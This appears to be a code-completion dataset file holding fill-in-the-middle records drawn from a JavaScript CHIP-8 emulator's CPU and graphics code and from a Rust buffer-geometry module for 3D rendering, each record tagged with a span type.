if (CHIP8.r.I + CHIP8.r.V[reg] > 0xfff) {
CHIP8.r.V[0xf] = 1;
}
CHIP8.r.I += CHIP8.r.V[reg];
return CODES.addI;
case 0x29:
CHIP8.r.I = CHIP8.r.V[reg] * 5;
return CODES.fontSetI;
case 0x33:
// CONVERTS VX TO DECIMAL; DUMPS
// BASE-10 DIGITS TO MEMORY
let rn = CHIP8.r.V[reg];
for (let d = 0; d <= 2; d++) {
CHIP8_MEM[CHIP8.r.I + d] = (Math.floor(rn / Math.pow(10, 2 - d))) % 10;
}
return CODES.decimalize;
case 0x55:
// DUMP V0~VX TO MEMORY
for (let i = 0x0; i <= reg; i++) {
CHIP8_MEM[CHIP8.r.I + i] = CHIP8.r.V[i];
}
return CODES.dumpReg;
case 0x65:
// RESTORE FROM MEMORY TO V0~VX
for (let i = 0x0; i <= reg; i++) {
CHIP8.r.V[i] = CHIP8_MEM[CHIP8.r.I + i];
}
return CODES.restoreReg;
default:
console.error("0xF code not supported: " + hex(mode));
}
return CODES.unknown;
},
handleOp0: function(mode) {
switch(mode) {
case 0xE0:
CHIP8_GRAPHICS.clear();
return CODES.dispclear;
case 0xEE:
CHIP8.r.SP -= 1;
CHIP8.r.PC = CHIP8.ST[CHIP8.r.SP];
CHIP8.ST[CHIP8.r.SP] = 0;
return CODES.return;
default:
console.error("RCA 1802 (" + mode.toString(16) + ") not supported: " + hex(mode));
}
return CODES.unknown;
},
handleMath: function(mode, x, y) {
switch (mode) {
case 0x0:
CHIP8.r.V[x] = CHIP8.r.V[y]
return CODES.copyReg;
case 0x1:
CHIP8.r.V[x] |= CHIP8.r.V[y]
return CODES.or;
case 0x2:
CHIP8.r.V[x] &= CHIP8.r.V[y]
return CODES.and;
case 0x3:
CHIP8.r.V[x] ^= CHIP8.r.V[y]
return CODES.xor;
case 0x4:
if (CHIP8.r.V[x] + CHIP8.r.V[y] > 0xff) {
CHIP8.r.V[0xf] = 1;
}
CHIP8.r.V[x] += CHIP8.r.V[y]
return CODES.add;
case 0x5:
if (CHIP8.r.V[x] > CHIP8.r.V[y]) {
CHIP8.r.V[0xf] = 1;
}
CHIP8.r.V[x] -= CHIP8.r.V[y]
return CODES.sub;
case 0x6:
CHIP8.r.V[0xf] = CHIP8.r.V[x] & 0x1;
CHIP8.r.V[x] >>= 1;
return CODES.rightShift;
case 0x7:
if (CHIP8.r.V[y] > CHIP8.r.V[x]) {
CHIP8.r.V[0xf] = 1;
}
CHIP8.r.V[x] = CHIP8.r.V[y] - CHIP8.r.V[x]
return CODES.subInv;
case 0xE:
CHIP8.r.V[0xf] = CHIP8.r.V[x] != 0x0 ? 0x1 : 0x0;
CHIP8.r.V[x] <<= 1;
return CODES.leftShift;
default:
console.error("math opcode not supported: 0x" + hex(mode));
}
return CODES.unknown;
},
}
// There are 0xFFF (~4096) bytes of memory here.
CHIP8_MEM = new Uint8Array(new ArrayBuffer(4096));
CHIP8_GRAPHICS = {
// To fit a resolution of 64x32. Might
// as well give it a full byte..
buffer: new Uint8Array(new ArrayBuffer(64*32)),
// NAIVE drawing function
draw: function() {
let ctx = document.getElementById("screen").getContext("2d");
for (let p = 0; p < CHIP8_GRAPHICS.buffer.length; p++) {
let x = p % 64, y = Math.floor(p / 64);
ctx.fillStyle = MIDNIGHT.bg;
ctx.fillRect(x * 10, y * 10, 10, 10);
if (CHIP8_GRAPHICS.buffer[p] > 0) {
ctx.fillStyle = MIDNIGHT.fg;
ctx.fillRect(x * 10 + 1, y * 10 + 1, 8, 8);
}
}
},
drawSprite: function(x, y, n) {
// Starting from (x, y),
// reads N bytes from memory
// starting at I. Each byte represents
// one 8-pixel row.
x = CHIP8.r.V[x];
y = CHIP8.r.V[y];
let ctx = document.getElementById("screen").getContext("2d");
ctx.clearRect(x, y, 8, n);
CHIP8.r.V[0xF] = 0;
for (let ind = 0; ind < n; ind++) {
let row = CHIP8_MEM[CHIP8.r.I + ind];
let ny = (y + ind) % 32;
for (let tx = 0; tx < 8; tx++) {
let nx = (x + (7 - tx)) % 64;
let p = nx + (ny * 64);
let old = CHIP8_GRAPHICS.buffer[p];
CHIP8_GRAPHICS.buffer[p] ^= row & 0x1;
if (old == 0x1 && CHIP8_GRAPHICS.buffer[p] == 0x0) {
CHIP8.r.V[0xF] = 1;
}
row >>= 1;
}
}
CHIP8_GRAPHICS.draw();
},
forceWash: function() {
let ctx = document.getElementById("screen").getContext("2d");
ctx.fillStyle = MIDNIGHT.bg;
ctx.fillRect(0, 0, 640, 360);
},
clear: function() {
// TODO: Add more to clear.
CHIP8_GRAPHICS.forceWash();
CHIP8_GRAPHICS.buffer = new Uint8Array(new ArrayBuffer(64*32));
}
}
let FPS_INTERVAL = 1;
function loadROM(fileList) {
if (fileList.length > 0) {
document.getElementById("romInput").hidden = true;
document.getElementById("romHelper").hidden = true;
document.getElementById("helperText2").hidden = true;
document.getElementById("helperText").innerHTML = `<b>Nice!</b> You can now use the controls below to start emulating.
<br>Use the left shoulder of your keyboard (1-4, Q-R, A-F, Z-V) as
<br>the hexpad input. You can also see the "Keys" tab for key bindings.
<br><br>To load a different ROM, please refresh the page.
<br><br>Enjoy the emulator!`
// Load it into memory!
fileList[0].arrayBuffer().then((b) => {
console.log("ROM read completed, size = " + new Uint8Array(b).length);
CHIP8.memLoad(b);
drawDebugger();
})
} else {
console.log("change found, but no files uploaded.");
}
}
let clockInterval;
function startLoop() {
clearLoop();
FPS_INTERVAL = 1;
clockInterval = setInterval(loop, FPS_INTERVAL);
}
function startSlowLoop() {
clearLoop();
DEBUGGER.slowMode = true;
FPS_INTERVAL = 200;
clockInterval = setInterval(loop, FPS_INTERVAL);
}
function loop() {
CHIP8.read();
drawDebugger();
}
function init() {
CHIP8_GRAPHICS.clear();
CHIP8_GRAPHICS.draw();
drawDebugger();
}
function clearLoop() {
if (clockInterval) {
clearInterval(clockInterval);
DEBUGGER.slowMode = false;
clockInterval = 0;
}
} | memLoad | identifier_name |
cpu.js | // https://en.wikipedia.org/wiki/CHIP-8
// http://www.codeslinger.co.uk/pages/projects/chip8/hardware.html
// BYTE = 1 byte
// WORD = 2 bytes
MIDNIGHT = {
fg: "#d387ff",
bg: "#380c52",
}
CHIP8 = {
r: {
// 8-bit registers
// Doubles as special FLAG
V: new Uint8Array(new ArrayBuffer(16)),
I: 0, // ADDRESS REGISTER (16-bit)
PC: 0, // PROGRAM COUNTER (16-bit)
SP: 0, // STACK POINTER (points to empty top)
TD: 0, // DELAY TIMER
TS: 0, // SOUND TIMER
},
ST: new Uint16Array(new ArrayBuffer(64)), // THE STACK!
KEYS: new Uint8Array(new ArrayBuffer(16)),
KH: 0x0,
// Inputs a key, removes the hold key flag if set
inputKey(key) {
if (CHIP8.KH > 0x0) {
CHIP8.r.V[CHIP8.KH - 1] = key;
CHIP8.KH = 0x0;
}
CHIP8.KEYS[key] = 0x1;
},
// Releases a key
releaseKey(key) {
CHIP8.KEYS[key] = 0x0;
},
// Loads in bytes from PRGMBUFFER onto 0x200-.
memLoad(prgmBuffer) {
console.log("Loading program buffer into memory.")
CHIP8.r.I = 0;
CHIP8.r.PC = 0x200;
CHIP8.r.V = new Uint8Array(new ArrayBuffer(16));
prgm = new Uint8Array(prgmBuffer);
for (let i = 0; i < prgm.length; i++) {
CHIP8_MEM[i + 0x200] = prgm[i];
}
console.log("Also loading reserved fonts.")
for (let i = 0; i < FONT.length; i++) {
for (let ix = 0; ix < FONT[i].length; ix++) {
CHIP8_MEM[i * 5 + ix] = FONT[i][ix];
}
}
},
// Consumes from memory the next operation.
// Reads for one word/two bytes!
read: function() {
if (CHIP8.KH > 0x0) {
return;
}
nextOp = CHIP8_MEM[CHIP8.r.PC];
nextOp <<= 8;
nextOp |= CHIP8_MEM[CHIP8.r.PC + 1];
CHIP8.r.PC += 2;
CHIP8.handleTimers();
DEBUGGER.report(nextOp, CHIP8.do(nextOp));
},
// Performs an opcode operation
// Needs to handle all 35 opcodes!
do: function(op) {
firstDigit = (op & 0xf000) >> 12;
secondDigit = (op & 0x0f00) >> 8;
thirdDigit = (op & 0x00f0) >> 4;
fourthDigit = op & 0x000f;
switch (firstDigit) {
case 0x0:
// handle 0x0..
return CHIP8.handleOp0(op & 0xfff);
case 0x1:
// JUMP opcode (0x1NNN)
if ((op & 0x0fff) == CHIP8.r.PC - 0x2) {
CHIP8.r.PC = op & 0x0fff;
return CODES.terminate;
}
CHIP8.r.PC = op & 0x0fff;
return CODES.jump;
case 0x2:
// CALL SUBROUTINE (0x2NNN)
// Function call (advanced jump)
CHIP8.ST[CHIP8.r.SP] = CHIP8.r.PC;
CHIP8.r.SP += 1;
CHIP8.r.PC = op & 0x0fff;
return CODES.call;
case 0x3:
// EQUALS OP (0x3XNN)
// Skips next instruction
// if VX == NN
if (CHIP8.r.V[secondDigit] == (op & 0xff)) {
CHIP8.r.PC += 2;
}
return CODES.eq;
case 0x4:
// NOT EQUALS OP (0x4XNN)
// Skips next instruction
// if VX != NN
if (CHIP8.r.V[secondDigit] != (op & 0xff)) {
CHIP8.r.PC += 2;
}
return CODES.neq;
case 0x5:
// EQUALS REG OP (0x5XY0)
// Skips next instruction
// if VX == VY
if (fourthDigit == 0) {
if (CHIP8.r.V[secondDigit] == CHIP8.r.V[thirdDigit]) {
CHIP8.r.PC += 2;
}
return CODES.eqReg;
}
case 0x6:
// LOAD TO REG (0x6XNN)
// Sets VX to NN.
CHIP8.r.V[secondDigit] = op & 0xff;
return CODES.loadToReg;
case 0x7:
// ADD TO REG (0x7XNN)
// Sets VX to VX + NN.
CHIP8.r.V[secondDigit] += op & 0xff;
return CODES.addToReg;
case 0x8:
// Handle math!
return CHIP8.handleMath(fourthDigit, secondDigit, thirdDigit);
case 0x9:
// NOT EQUALS REG OP (0x9XY0)
// Skips next instruction
// if VX != VY
if (fourthDigit == 0) {
if (CHIP8.r.V[secondDigit] != CHIP8.r.V[thirdDigit]) {
CHIP8.r.PC += 2;
}
return CODES.neqReg;
}
case 0xA:
// SET I opcode (0xANNN)
CHIP8.r.I = op & 0x0fff;
return CODES.setI;
case 0xB:
// JUMP + V opcode (0xBNNN)
CHIP8.r.PC = (op & 0x0fff) + CHIP8.r.V[0];
return CODES.jumpV;
case 0xC:
// SET RANDOM to V opcode (0xCXNN)
let rand = Math.floor(Math.random() * 256);
CHIP8.r.V[secondDigit] = rand & (op & 0xff);
return CODES.setRand;
case 0xD:
// DRAW CODE
CHIP8_GRAPHICS.drawSprite(secondDigit, thirdDigit, fourthDigit);
return CODES.draw;
case 0xE:
return CHIP8.handleOpE(secondDigit, op & 0xff);
case 0xF:
return CHIP8.handleOpF(secondDigit, op & 0xff);
default:
console.error("opcode not supported: " + hex(op));
}
return CODES.unknown;
},
handleOpE: function(reg, mode) {
switch (mode) {
case 0x9E:
if (CHIP8.KEYS[CHIP8.r.V[reg]] == 0x1) {
CHIP8.r.PC += 2;
}
return CODES.keyEqJump;
case 0xA1:
if (CHIP8.KEYS[CHIP8.r.V[reg]] == 0x0) {
CHIP8.r.PC += 2;
}
return CODES.keyNotEqJump;
default:
console.error("Key 0xE code not supported: " + hex(mode));
}
return CODES.unknown;
},
handleTimers: function() {
if (CHIP8.r.TD > 0) {
CHIP8.r.TD -= 1;
}
if (CHIP8.r.TS > 0) {
CHIP8.r.TS -= 1;
}
},
handleOpF: function(reg, mode) {
switch (mode) {
case 0x07:
// SET VX to DELAY TIMER
CHIP8.r.V[reg] = CHIP8.r.TD;
return CODES.getDelay;
case 0x0A:
// WAIT FOR KEY
CHIP8.KH = reg + 0x1;
return CODES.keyWait;
case 0x15:
// SET DELAY TIMER to VX
CHIP8.r.TD = CHIP8.r.V[reg];
return CODES.setDelay;
case 0x18:
// SET SOUND TIMER to VX
CHIP8.r.TS = CHIP8.r.V[reg];
return CODES.setSound;
case 0x1E:
// ADD VX TO I
if (CHIP8.r.I + CHIP8.r.V[reg] > 0xfff) {
CHIP8.r.V[0xf] = 1;
}
CHIP8.r.I += CHIP8.r.V[reg];
return CODES.addI;
case 0x29:
CHIP8.r.I = CHIP8.r.V[reg] * 5;
return CODES.fontSetI;
case 0x33:
// CONVERTS VX TO DECIMAL; DUMPS
// BASE-10 DIGITS TO MEMORY
let rn = CHIP8.r.V[reg];
for (let d = 0; d <= 2; d++) {
CHIP8_MEM[CHIP8.r.I + d] = (Math.floor(rn / Math.pow(10, 2 - d))) % 10;
}
return CODES.decimalize;
case 0x55:
// DUMP V0~VX TO MEMORY
for (let i = 0x0; i <= reg; i++) {
CHIP8_MEM[CHIP8.r.I + i] = CHIP8.r.V[i];
}
return CODES.dumpReg;
case 0x65:
// RESTORE FROM MEMORY TO V0~VX
for (let i = 0x0; i <= reg; i++) {
CHIP8.r.V[i] = CHIP8_MEM[CHIP8.r.I + i];
}
return CODES.restoreReg;
default:
console.error("0xF code not supported: " + hex(mode));
}
return CODES.unknown;
},
handleOp0: function(mode) {
switch(mode) {
case 0xE0:
CHIP8_GRAPHICS.clear();
return CODES.dispclear;
case 0xEE:
CHIP8.r.SP -= 1;
CHIP8.r.PC = CHIP8.ST[CHIP8.r.SP];
CHIP8.ST[CHIP8.r.SP] = 0;
return CODES.return;
default:
console.error("RCA 1802 (" + mode.toString(16) + ") not supported: " + hex(mode));
}
return CODES.unknown;
},
handleMath: function(mode, x, y) {
switch (mode) {
case 0x0:
CHIP8.r.V[x] = CHIP8.r.V[y]
return CODES.copyReg;
case 0x1:
CHIP8.r.V[x] |= CHIP8.r.V[y]
return CODES.or;
case 0x2:
CHIP8.r.V[x] &= CHIP8.r.V[y]
return CODES.and;
case 0x3:
CHIP8.r.V[x] ^= CHIP8.r.V[y]
return CODES.xor;
case 0x4:
if (CHIP8.r.V[x] + CHIP8.r.V[y] > 0xff) {
CHIP8.r.V[0xf] = 1;
}
CHIP8.r.V[x] += CHIP8.r.V[y]
return CODES.add;
case 0x5:
if (CHIP8.r.V[x] > CHIP8.r.V[y]) {
CHIP8.r.V[0xf] = 1;
}
CHIP8.r.V[x] -= CHIP8.r.V[y]
return CODES.sub;
case 0x6:
CHIP8.r.V[0xf] = CHIP8.r.V[x] & 0x1;
CHIP8.r.V[x] >>= 1;
return CODES.rightShift;
case 0x7:
if (CHIP8.r.V[y] > CHIP8.r.V[x]) {
CHIP8.r.V[0xf] = 1;
}
CHIP8.r.V[x] = CHIP8.r.V[y] - CHIP8.r.V[x]
return CODES.subInv;
case 0xE:
CHIP8.r.V[0xf] = CHIP8.r.V[x] != 0x0 ? 0x1 : 0x0;
CHIP8.r.V[x] <<= 1;
return CODES.leftShift;
default:
console.error("math opcode not supported: 0x" + hex(mode));
}
return CODES.unknown;
},
}
// There are 0xFFF (~4096) bytes of memory here.
CHIP8_MEM = new Uint8Array(new ArrayBuffer(4096));
CHIP8_GRAPHICS = {
// To fit a resolution of 64x32. Might
// as well give it a full byte..
buffer: new Uint8Array(new ArrayBuffer(64*32)),
// NAIVE drawing function
draw: function() {
let ctx = document.getElementById("screen").getContext("2d");
for (let p = 0; p < CHIP8_GRAPHICS.buffer.length; p++) {
let x = p % 64, y = Math.floor(p / 64);
ctx.fillStyle = MIDNIGHT.bg;
ctx.fillRect(x * 10, y * 10, 10, 10);
if (CHIP8_GRAPHICS.buffer[p] > 0) {
ctx.fillStyle = MIDNIGHT.fg;
ctx.fillRect(x * 10 + 1, y * 10 + 1, 8, 8);
}
}
},
drawSprite: function(x, y, n) {
// Starting from (x, y),
// reads N bytes from memory
// starting at I. Each byte represents
// one 8-pixel row.
x = CHIP8.r.V[x];
y = CHIP8.r.V[y];
let ctx = document.getElementById("screen").getContext("2d");
ctx.clearRect(x, y, 8, n);
CHIP8.r.V[0xF] = 0;
for (let ind = 0; ind < n; ind++) {
let row = CHIP8_MEM[CHIP8.r.I + ind];
let ny = (y + ind) % 32;
for (let tx = 0; tx < 8; tx++) {
let nx = (x + (7 - tx)) % 64;
let p = nx + (ny * 64);
let old = CHIP8_GRAPHICS.buffer[p];
CHIP8_GRAPHICS.buffer[p] ^= row & 0x1;
if (old == 0x1 && CHIP8_GRAPHICS.buffer[p] == 0x0) {
CHIP8.r.V[0xF] = 1;
}
row >>= 1;
}
}
CHIP8_GRAPHICS.draw();
},
forceWash: function() {
let ctx = document.getElementById("screen").getContext("2d");
ctx.fillStyle = MIDNIGHT.bg;
ctx.fillRect(0, 0, 640, 360);
},
clear: function() {
// TODO: Add more to clear.
CHIP8_GRAPHICS.forceWash();
CHIP8_GRAPHICS.buffer = new Uint8Array(new ArrayBuffer(64*32));
}
}
let FPS_INTERVAL = 1;
function loadROM(fileList) {
if (fileList.length > 0) {
document.getElementById("romInput").hidden = true;
document.getElementById("romHelper").hidden = true;
document.getElementById("helperText2").hidden = true;
document.getElementById("helperText").innerHTML = `<b>Nice!</b> You can now use the controls below to start emulating.
<br>Use the left shoulder of your keyboard (1-4, Q-R, A-F, Z-V) as
<br>the hexpad input. You can also see the "Keys" tab for key bindings.
<br><br>To load a different ROM, please refresh the page.
<br><br>Enjoy the emulator!`
// Load it into memory!
fileList[0].arrayBuffer().then((b) => {
console.log("ROM read completed, size = " + new Uint8Array(b).length);
CHIP8.memLoad(b);
drawDebugger();
})
} else {
console.log("change found, but no files uploaded.");
}
}
let clockInterval;
function startLoop() {
clearLoop();
FPS_INTERVAL = 1;
clockInterval = setInterval(loop, FPS_INTERVAL);
}
function startSlowLoop() |
function loop() {
CHIP8.read();
drawDebugger();
}
function init() {
CHIP8_GRAPHICS.clear();
CHIP8_GRAPHICS.draw();
drawDebugger();
}
function clearLoop() {
if (clockInterval) {
clearInterval(clockInterval);
DEBUGGER.slowMode = false;
clockInterval = 0;
}
} | {
clearLoop();
DEBUGGER.slowMode = true;
FPS_INTERVAL = 200;
clockInterval = setInterval(loop, FPS_INTERVAL);
} | identifier_body |
buffer_geometry.rs | extern crate uuid;
extern crate heck;
extern crate specs;
use self::uuid::Uuid;
use self::heck::ShoutySnakeCase;
use std::vec::Vec;
use std::fmt;
use std::sync::{Arc,Mutex, LockResult, MutexGuard};
use std::mem;
use std::error::Error;
use self::specs::{Component, VecStorage};
use math::{
Vector,
Vector2,
Vector3,
Vector4,
Matrix2,
Matrix3,
Matrix4,
};
use core::{
BBox3,
};
#[allow(dead_code)]
#[derive(Clone, Debug)]
pub enum BufferData {
Matrix2(Vec<Matrix2<f32>>),
Matrix3(Vec<Matrix3<f32>>),
Matrix4(Vec<Matrix4<f32>>),
Vector2(Vec<Vector2<f32>>),
Vector3(Vec<Vector3<f32>>),
Vector4(Vec<Vector4<f32>>),
F32(Vec<f32>),
I32(Vec<i32>),
U32(Vec<u32>),
I16(Vec<i16>),
U16(Vec<u16>),
I8(Vec<i8>),
U8(Vec<u8>),
}
impl BufferData {
pub fn item_size(&self) -> usize {
match self {
BufferData::Matrix2(_) => 4,
BufferData::Matrix3(_) => 9,
BufferData::Matrix4(_) => 16,
BufferData::Vector2(_) => 2,
BufferData::Vector3(_) => 3,
BufferData::Vector4(_) => 4,
BufferData::F32(_) => 1,
BufferData::I32(_) => 1,
BufferData::U32(_) => 1,
BufferData::I16(_) => 1,
BufferData::U16(_) => 1,
BufferData::I8(_) => 1,
BufferData::U8(_) => 1,
}
}
pub fn len(&self) -> usize {
match self {
BufferData::Matrix2(a) => a.len(),
BufferData::Matrix3(a) => a.len(),
BufferData::Matrix4(a) => a.len(),
BufferData::Vector2(a) => a.len(),
BufferData::Vector3(a) => a.len(),
BufferData::Vector4(a) => a.len(),
BufferData::F32(a) => a.len(),
BufferData::I32(a) => a.len(),
BufferData::U32(a) => a.len(),
BufferData::I16(a) => a.len(),
BufferData::U16(a) => a.len(),
BufferData::I8(a) => a.len(),
BufferData::U8(a) => a.len(),
}
}
pub fn elem_byte_len(&self) -> usize {
let bytes = match self {
BufferData::Matrix2(_) => mem::size_of::<f32>(),
BufferData::Matrix3(_) => mem::size_of::<f32>(),
BufferData::Matrix4(_) => mem::size_of::<f32>(),
BufferData::Vector2(_) => mem::size_of::<f32>(),
BufferData::Vector3(_) => mem::size_of::<f32>(),
BufferData::Vector4(_) => mem::size_of::<f32>(),
BufferData::F32(_) => mem::size_of::<f32>(),
BufferData::I32(_) => mem::size_of::<i32>(),
BufferData::U32(_) => mem::size_of::<u32>(),
BufferData::I16(_) => mem::size_of::<i16>(),
BufferData::U16(_) => mem::size_of::<u16>(),
BufferData::I8(_) => mem::size_of::<i8>(),
BufferData::U8(_) => mem::size_of::<u8>(),
};
self.item_size() * bytes
}
pub fn definition(&self) -> String {
match self {
BufferData::Matrix2(_) => "MAT2".to_string(),
BufferData::Matrix3(_) => "MAT3".to_string(),
BufferData::Matrix4(_) => "MAT4".to_string(),
BufferData::Vector2(_) => "VEC2".to_string(),
BufferData::Vector3(_) => "VEC3".to_string(),
BufferData::Vector4(_) => "VEC4".to_string(),
BufferData::F32(_) => "F32".to_string(),
BufferData::I32(_) => "I32".to_string(),
BufferData::U32(_) => "U32".to_string(),
BufferData::I16(_) => "I16".to_string(),
BufferData::U16(_) => "U16".to_string(),
BufferData::I8(_) => "I8".to_string(),
BufferData::U8(_) => "U8".to_string(),
}
}
}
#[derive(Clone, Debug, Eq, PartialEq)]
pub enum BufferType {
Position,
Normal,
Tangent,
UV(usize),
Color(usize),
Joint(usize),
Weight(usize),
Other(String),
}
impl BufferType {
pub fn definition(&self) -> String {
match self {
BufferType::Position => "POSITION".to_string(),
BufferType::Normal => "NORMAL".to_string(),
BufferType::Tangent => "TANGENT".to_string(),
BufferType::UV(n) => format!("UV_{}", n),
BufferType::Color(n) => format!("COLOR_{}", n),
BufferType::Joint(n) => format!("JOINT_{}", n),
BufferType::Weight(n) => format!("WEIGHT_{}", n),
BufferType::Other(string) => string.to_shouty_snake_case(),
}
}
}
#[derive(Clone, Debug)]
pub struct BufferAttribute {
pub data: BufferData,
pub buffer_type: BufferType,
pub dynamic: bool,
pub normalized: bool,
// pub version: usize,
}
impl BufferAttribute {
pub fn | (&self) -> usize {
let l = self.len();
l / self.item_size()
}
pub fn item_size(&self) -> usize {
self.data.item_size()
}
pub fn len(&self) -> usize {
self.data.len()
}
pub fn set_normalized(&mut self, normalized: bool) -> &mut Self {
self.normalized = normalized;
self
}
pub fn set_dynamic(&mut self, dynamic: bool) -> &mut Self {
self.dynamic = dynamic;
self
}
pub fn definition(&self) ->String {
format!("VERTEX_{}_{}", self.buffer_type.definition(), self.data.definition())
}
}
#[allow(dead_code)]
#[derive(Hash, Eq, PartialEq, Debug, Clone)]
pub struct BufferGroup {
pub start: usize,
pub material_index: usize,
pub count: usize,
pub name: Option<String>,
}
#[allow(dead_code)]
#[derive(Clone)]
pub struct BufferGeometry {
pub uuid: Uuid,
pub name: String,
pub groups: Vec<BufferGroup>,
pub indices: Vec<u32>,
pub attributes: Vec<BufferAttribute>,
pub buffer_order: Vec<BufferType>,
pub b_box: Option<BBox3<f32>>,
callbacks: Vec<fn(&mut BufferGeometry)>,
}
impl fmt::Debug for BufferGeometry {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "=====================
BufferGeometry: {}
uuid: {}
groups: {:?}
b_box: {:?}
callbacks: {}
indices: {:?}
attributes: {:?}
=====================",
self.name,
self.uuid,
self.groups,
self.b_box,
self.callbacks.len(),
self.indices,
self.attributes,
)
}
}
#[allow(dead_code)]
impl BufferGeometry {
pub fn new() -> Self {
Self {
attributes: Vec::new(),
groups: Vec::new(),
indices: Vec::new(),
uuid: Uuid::new_v4(),
callbacks: Vec::new(),
name: "".to_string(),
b_box: None,
buffer_order: vec![BufferType::Position, BufferType::Normal, BufferType::UV(0), BufferType::Color(0), BufferType::Joint(0), BufferType::Weight(0)],
}
}
pub fn iter_attributes<'a>(&'a self) -> impl Iterator<Item= &'a BufferAttribute> {
self.buffer_order.iter()
.map(move |e| self.get_attribute(e.clone()) )
.filter(|e| e.is_some() )
.map(|e| e.unwrap() )
}
// pub fn iter_attributes_mut<'a>(&'a mut self) -> impl Iterator<Item= &'a mut BufferAttribute> {
// self.buffer_order.iter()
// .map(move |e| self.get_attribute_mut(e.clone()) )
// .filter(|e| e.is_some() )
// .map(|e| e.unwrap() )
// }
pub fn set_indices(&mut self, indices: Vec<u32>) -> &mut Self {
self.indices = indices;
self
}
pub fn gen_indices(&mut self) -> Result<(), &str> {
let mut len = 0;
match self.get_attribute(BufferType::Position) {
None => {
return Err("BufferGeometry: cant find position");
}
Some(positions) => {
len = positions.len();
}
};
let indices = (0..len as u32).collect();
self.set_indices(indices);
Ok(())
}
pub fn add_buffer_attribute(
&mut self,
buffer_attribute: BufferAttribute,
) -> &mut BufferAttribute {
let index = self.attributes.iter().position( |attr| attr.buffer_type == buffer_attribute.buffer_type);
if let Some(index) = index {
self.attributes.remove(index);
}
self.attributes.push(buffer_attribute);
if !self.attributes.iter().all( |e| e.len() == self.attributes[0].len() ) {
panic!("BufferGeometry: different buffer length: {}", self.name);
}
let i = self.attributes.len() - 1;
&mut self.attributes[i]
}
pub fn create_buffer_attribute(
&mut self,
buffer_type: BufferType,
data: BufferData,
) -> &mut BufferAttribute {
let buffer_attribute = BufferAttribute {
buffer_type,
data,
normalized: false,
dynamic: false,
// version: 0,
};
self.add_buffer_attribute(buffer_attribute)
}
pub fn on_drop(&mut self, cb: fn(&mut BufferGeometry)) {
self.callbacks.push(cb);
}
pub fn get_attribute(&self, buffer_type: BufferType) -> Option<&BufferAttribute> {
self.attributes.iter().find(|e| e.buffer_type == buffer_type)
}
pub fn has_attribute(&self, buffer_type: BufferType) -> bool {
self.attributes.iter().any(|e| e.buffer_type == buffer_type)
}
pub fn get_attribute_mut(&mut self, buffer_type: BufferType) -> Option<&mut BufferAttribute> {
self.attributes.iter_mut().find(|e| e.buffer_type == buffer_type)
}
pub fn generate_normals(&mut self) {
let mut normals = None;
{
let attribute = self.get_attribute(BufferType::Position).unwrap();
if let BufferData::Vector3(data) = &attribute.data {
let mut calc_normals = vec![Vec::new(); data.len()];
let indices = &self.indices;
let il = indices.len();
let mut i = 0;
while i < il {
let a = &data[ indices[i] as usize];
let b = &data[ indices[i+1] as usize];
let c = &data[ indices[i+2] as usize];
let mut cb = c - b;
let ab = a - b;
cb.cross(&ab);
cb.normalize();
calc_normals[ indices[i] as usize ].push(cb.clone());
calc_normals[ indices[i+1] as usize ].push(cb.clone());
calc_normals[ indices[i+2] as usize ].push(cb);
i+=3;
}
let calc_normals = calc_normals
.iter()
.map(|items|{
if items.len() == 1 {
return items[0].clone();
}
let mut res = Vector3::add_all_vectors(items);
res.normalize();
res
})
.collect();
normals = Some(calc_normals);
}
}
if let Some(normal) = normals {
self.create_buffer_attribute(BufferType::Normal, BufferData::Vector3(normal));
}
}
pub fn duplicate(&self) -> Self {
let mut data = self.clone();
data.uuid = Uuid::new_v4();
data
}
pub fn update_box3 (&mut self) -> Result <(), Box<Error>> {
let mut b_box = None;
if let Some(attr) = self.get_attribute(BufferType::Position) {
if let BufferData::Vector3(positions) = &attr.data {
let mut b = BBox3::new_empty();
b.set_from_array(&positions[..]);
b_box = Some(b);
}
}
if b_box.is_none() {return Err( Box::from("cant update b_box") ); }
self.b_box = b_box;
Ok(())
}
pub fn get_b_box(&mut self) -> Result<BBox3<f32>, Box<Error>> {
if self.b_box.is_some() {
return Ok(self.b_box.as_ref().unwrap().clone())
}
self.update_box3()?;
Ok(self.b_box.as_ref().unwrap().clone())
}
pub fn scale_positions_by_vec(&mut self, v: &Vector3<f32>) -> Option<()> {
if let Some(attr) = self.get_attribute_mut(BufferType::Position) {
if let BufferData::Vector3(positions) = &mut attr.data {
positions
.iter_mut()
.for_each(|e| {
e.multiply(v);
});
return Some(());
}
return None;
}
None
}
pub fn get_vertex_byte_size(&self) -> usize {
self.iter_attributes().map(|attr| attr.data.elem_byte_len()).sum()
}
}
impl Drop for BufferGeometry {
fn drop(&mut self) {
while self.callbacks.len() > 0 {
let cb = self.callbacks.pop().unwrap();
cb(self);
}
}
}
#[derive(Clone)]
pub struct SharedGeometry (Arc<Mutex<BufferGeometry>>);
impl SharedGeometry {
pub fn new(g: BufferGeometry) -> Self {
SharedGeometry(Arc::new(Mutex::new(g)))
}
pub fn lock(&mut self) -> LockResult<MutexGuard<BufferGeometry>> {
self.0.lock()
}
}
impl Component for SharedGeometry {
type Storage = VecStorage<Self>;
}
| count | identifier_name |
buffer_geometry.rs | extern crate uuid;
extern crate heck;
extern crate specs;
use self::uuid::Uuid;
use self::heck::ShoutySnakeCase;
use std::vec::Vec;
use std::fmt;
use std::sync::{Arc,Mutex, LockResult, MutexGuard};
use std::mem;
use std::error::Error;
use self::specs::{Component, VecStorage};
use math::{
Vector,
Vector2,
Vector3,
Vector4,
Matrix2,
Matrix3,
Matrix4,
};
use core::{
BBox3,
};
#[allow(dead_code)]
#[derive(Clone, Debug)]
pub enum BufferData {
Matrix2(Vec<Matrix2<f32>>),
Matrix3(Vec<Matrix3<f32>>),
Matrix4(Vec<Matrix4<f32>>),
Vector2(Vec<Vector2<f32>>),
Vector3(Vec<Vector3<f32>>),
Vector4(Vec<Vector4<f32>>),
F32(Vec<f32>),
I32(Vec<i32>),
U32(Vec<u32>),
I16(Vec<i16>),
U16(Vec<u16>),
I8(Vec<i8>),
U8(Vec<u8>),
}
impl BufferData {
pub fn item_size(&self) -> usize {
match self {
BufferData::Matrix2(_) => 4,
BufferData::Matrix3(_) => 9,
BufferData::Matrix4(_) => 16,
BufferData::Vector2(_) => 2,
BufferData::Vector3(_) => 3,
BufferData::Vector4(_) => 4,
BufferData::F32(_) => 1,
BufferData::I32(_) => 1,
BufferData::U32(_) => 1,
BufferData::I16(_) => 1,
BufferData::U16(_) => 1,
BufferData::I8(_) => 1,
BufferData::U8(_) => 1,
}
}
pub fn len(&self) -> usize {
